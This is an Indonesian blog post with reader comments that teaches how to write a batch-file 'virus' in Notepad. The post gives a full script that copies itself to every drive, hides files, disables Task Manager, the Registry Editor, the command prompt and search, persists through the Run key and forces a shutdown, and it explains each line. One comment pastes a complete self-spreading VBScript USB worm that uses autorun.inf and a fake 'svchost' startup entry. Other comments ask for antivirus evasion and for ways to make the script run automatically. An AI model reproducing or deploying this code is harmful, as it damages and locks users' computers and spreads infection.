Bikin virus mudah dengan notepad

Akhir-akhir ini perkembangan virus semakin merajalela, baik itu virus local maupun virus bule he…

Oke kali ini saya akan berbagi sedikit, bagaimana cara membuat virus dengan cepat tetapi efeknya lumayan lah buat iseng… eit…eit… saya nggak ngajarin kalian buat iseng atau berbuat jahat lo… jadi kalo ada diantara kalian yang menyalahgunakannya, saya tidak bertanggung jawab, karena saya percaya diantara kalian semuanya orang-orang baik…🙂 (Inget : kalo kita dijailin orang nggak suka kan, gimana kalo kita dijailin orang lain, pengen marah kan…?? ). Lalu knapa ngajarin bikin virus?? Mungkin gitu ya pertanyaan kamu, oke deh saya jawab… orang yang bikin virus, pasti bisa juga bikin anti virusnya… kalo kagak bisa keterlaluan dech… nah untuk itu, kalo computer kita kena virus n kita bisa tahu kerja virus itu, kita akan bisa sendiri basmi tu virus tanpa antivirus, sebagaimana yang saya alami kemarin.. (tugas makalah 50 hal mau dikumpulin, eh kna virus.., antivirus terbaru kagak bs semua, untung bisa kembaliin…🙂 )

Mungkin kita akan berfikir, bikin virus tu susah amat.. yang pake bahasa VB lah, C++ apalagi pake bahasa Assembly wuih… bisa mbeler tu… emang bikin virus pake bahasa pemrograman itu bisa, tapi kali ini kita akan bikin virus dengan software yang udah ada di windows, kita akan gunakan notepad untuk bikin virus batch, jadi kagak terlalu rumit bikin virusnya n mudah dipahami…

Langsung aja saya berikan script virusnya, pembahasannya dibawah aja ya… (no 1,2, dsb tu Cuma no baris aja, nggak usah ditulis, tu agar mudah aja jelasinnya he…. )

1. Echo off > C:\virxx.txt

2. if no exist C:\Windows\%0 copy %0 C:\Windows

3. for %%p in (A C D E F G H) do copy %0 %%p:

4. for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt

5. for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s

6. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHiden /t REG_DWORD /d 0 /f

7. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

8. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

9. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f

10. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

11. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d C:\Windows\virxx.bat /f

12. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f

13. REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 2 /f

14. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 1 /f

15. Shutdown -s -t 360 -c “Virus Menjangkiti Komputer Anda” -f

16. Exit

Baris 1 : echo berfungsi untuk menampilkan pesan atau komentar yang diberikan user. Untuk lebih nyaman waktu tampil di command promt tambahkan “off” sehingga menjadi echo off

Baris 2 : digunakan agar virus memeriksa dirinya atau kembarannya atau jurus seribu bayangan yang telah berada diderektori C:\Windows ataukan kagak ada. Jika nggak ada maka akan mengeluarkan jurusnya kederiktori tersebut. %0 digunakan untuk menghandle nama dirinya sendiri

Baris 3 : digunakan untuk pengcopyan file virus ke drive A, C, D, E, F, G, dan H. perintah itu kita menggunakan perulangan agar penulisannya dapat dipersingkat. %%variabel atau %%p diatas adalah untuk menangani file dengan nama yang terlalu panjang, dan %0 untuk menghandle dirinya sendiri

Baris 4 : melakukan pendataan file berekstensi *.3gp yang ada didrive A, C, D, E, F, G dan H. dan hasilnya akan ditampilkan di drive C yang ada pada file virxx.txt

Baris 5 : untuk menyembunyikan file berekstensi *.3gp. penyembunyiannya tidak hanya dalam mode hiden biasa tapi dalam super hiden. Perintah +h dan +s untuk memasang atribun hiden dan system hiden. Perintah untuk balikannya attrib -h -s , sedang perintah /S untuk proses attrib hingga subfolder

Baris 6 : untuk memberikan nilai DWORD 0 untuk value ShowSuperHiden. Maka semua file yang beratribut system file tidak akan ditampakkan. Untuk mengembalikannya, ganti nilai 0 tersebut menjadi nilai 1.

Baris 7 : untuk menghilangkan fasilitas tool folder options pada Windows Explorer, untuk mengembalikannya ganti value 1 menjadi 0 agar fasilitas tool folder options bisa digunakan lagi, mudah bukan

Baris 8 : untuk melarang akses task manager. Nilai 1 untuk mendisable task manager, untuk megembalikannya agar bisa gunakan ganti nilai 1 menjadi 0

Baris 9 : untuk menon aktifkan fasilitas pencarian atau search, untuk mengembalikan sama kayak perintah lainnya, tinggal ganti angka 1 menjadi 0

Baris 10 : fungsinya untuk menghilangkan fasilitas run pada Ms. Windows

Baris 11 : untuk menjalankan file virus virxx.txt yang ada diderektori C:\Windows setiap computer melakukan starup. Gorun dalam script tersebut menunjukkan string value baru yang dibentuk oleh perintah tersebut.

Baris 12 : untuk mencegah akses user ke drive C. Nilai 4 maksudnya drive yang dilarang adalah drive C, jika nilai 8 maka drive yang dilarang adalah drive D. ngerti kan…???

Baris 13 : untuk mencegah penggunaan Comand Promt oleh user. Nilai 2 agar Command Promt tidak bisa diakses, namun file batch dapat jalan. Sedang nilai 0 akan menjalankan command promd dan file batch. Dan nilai 1 untuk mendisable keduanya (command promt dan file batch)

Baris 14 : untuk mengunci Registry Editor atau regedit agar tidak bisa diakses. Ganti aja nilai 1 jadi 0 untuk dapat mengakses lagi, menurut pengalaman saya, jika kamu nggak bisa gantinya (karena regedit nggak bisa diakses) gunaik script atau lebih gampangnya gunain software Tune Up Utilities.

Baris 15 : perintah yang kejam dan menyeramkan, mau tau kenapa?? Karena dengan hitungan 360 detik (yang saya berikan disitu) membuat computer akan shutdown dengan otomatis. Perintah -s digunakan untuk shutdown computer, jika -r maka akan melakukan restart. -c digunakan untuk menampilkan pesan dan -f untuk menutup paksa semua program yang lagi jalan-jalan🙂

Warning :

  • Jangan lupa cukup gunakan notepad yang ada diwindows
  • Ketikkan scriptnya virus
  • Dan simpan dengan file nama apa aja, tapi inget ekstensinya harus *.bat contohnya virxx.bat , n pada save as type nya pilih All Files

save

  • Oia intinya kalo kamu bikin virus kayak tadi atau kamu ingin menambah atau mendesain kerja virusnya, kamu harus tahu tentang regedit, gampang kok, tutorialnya juga banyak… udah pada bisa kan….
  • N satu lagi, ilmu bukan untuk menjailin atau berbuat jahat… tapi ilmu tu untuk membuat manfaat bagi orang lain… (sok bijak ni…..) 🙂

19 thoughts on “Bikin virus mudah dengan notepad

  1. udah pernah tahu nggak virus yusuf ali, iya sih tu virus mainnya cuma di luar negeri, blum masuk indonesia… tu virus bisa ngeblok situs2 porno, jadi kalo komputernya kena virus tu, n kamu buka situs porno, maka komputer kamu nggak bs diapa2in, cuma ada pilihan restart shutdown atau keluar dari situs itu… keren kan…
    dalam negeri kemarin jg ada yang bikin virus yang ngrusak file 3gp, katanya sih buat kebaikan,,,, katanya juga file 3gp banyak yg isinya gt2 an…
    trus tutorial ini juga untuk tahu logikanya aja kok, kalo kita tahu logika virus… nangani komputer kita yang kena virus juga enak kan… karena kita tahu logika nya… ya meskipun tutorialnya sederhana banget…..

  2. klo g ngrti sma s’x tntang virus n cra krja virus tsb gmn dunk… trus gmna Qta tw cra virus tu b’krja…………
    mkaci yach….

  3. untuk int :

    Untuk mengetahui kerja virus, biasa agak gampang kan, contohnya kalo fasilitas run, regedit, cmd, folder option, search, task manager, nah tu pasti kerjaan virus, atau ada tampilan / muncul pesan yang aneh, muncul file aneh difolder tertentu, ekstensi suatu file berubah, atau lainnya yang sejenis, tu kemungkinan juga kerjaan virus..
    Untuk mencari lokasi virus bisa pake tool Autoruns yang bagian dari tool SysinternalsSuit (liat http://www.microsoft.com/technet/sysinternals/default.mspx )
    Pilih tab logon, yang akan memperlihatkan daftar program yang berjalan di windows, cari file yang aneh atau tidak penting, dengan hilangkan ceklistnya, tapi ingat hati-hati dalam hilangin ceklistnya, bisa-bisa windows kita yang nggak jalan, pokoknya program ( rdpclip , userinit, explorer , dan ctfmon ) jangan dihilangin ceklistnya… ingat tu…
    Kalo ingin tahu deskripsi tentang proses aplikasinya lihat http://www.processlibrary.com biar nggak salah matiin program…

  4. Boz mau tanya nih,tu virus ke detect gag ama anti virus??.Kalo ke detect Ksih tw dunk caranya bikin virus yang laen yang gak bisa ke detect ma anti virus apapun!!!

  5. kawan kawan buka notepad kalian salin scrib di bawah ini simpan dengan nama erwinda_putra.exe.vbs
    AWAS…!!!!
    virus ini sangat berbahaya…
    apapun yang terjadi bukan tanggungan saya…
    SALAM MESRA BUAT HACKER PADANG YE…
    SALAMAT UNTUK PENGHANCURKAN..

    =====================================================
    ‘El Magnifico MAN
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
    set fs = createobject(”Scripting.FileSystemObject”)
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
    set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
    tf.attributes=39
    end if
    next
    set rg = createobject(”WScript.Shell”)
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
    rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
    rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
    if check 1 then
    Wscript.sleep 100000
    end if
    loop while check1
    set sd = createobject(”Wscript.shell”)
    sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

    do while year(now) >= 2008
    WScript.sleep 20000

    msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
    “ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
    “dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
    “iko permainan yang paten ma dunsanak” & vbcrlf & _
    vbcrlf & vbcrlf & _
    ” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
    ” aaa kini saaiknyo ma dunsanak”

    loop
    ==========================================================
    OIA NE PROMOSI DIKIT…
    KALO KALIAN KEPENGEN BUAT VIRUS…
    GW BANYAK PROGRAM BUAT VIRUS..
    KUNJUNGI AJA IMAEL GW OK…
    NE…

    CAMP_LUCK@YAHOO.COM

    SAYA BAKAL NGIRIMIN NYA DEH…
    KHUSUS BUAT KAWAN2 OK..
    BYE..2

  6. w seneng bisa negelihat lo.lo.lo semua dengan cara atau pembuatan virus… itu adalah hal yang bagus bwt di pelajari
    betul..ga..asal bisa mempertanggung jawabkan semuanya..
    karna virus bagi w adalah seni yang menakjubkan…….

  7. @aa : tinggal waktu save di notepad nya, pilih all, n save langsung namanya .bat

    @pemula : cara ngaktifinnya, coba di double klik, pasti langsung aktif, atau bikin script autorun untuk panggil tu script bad, jd langsung aktif otomatis

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s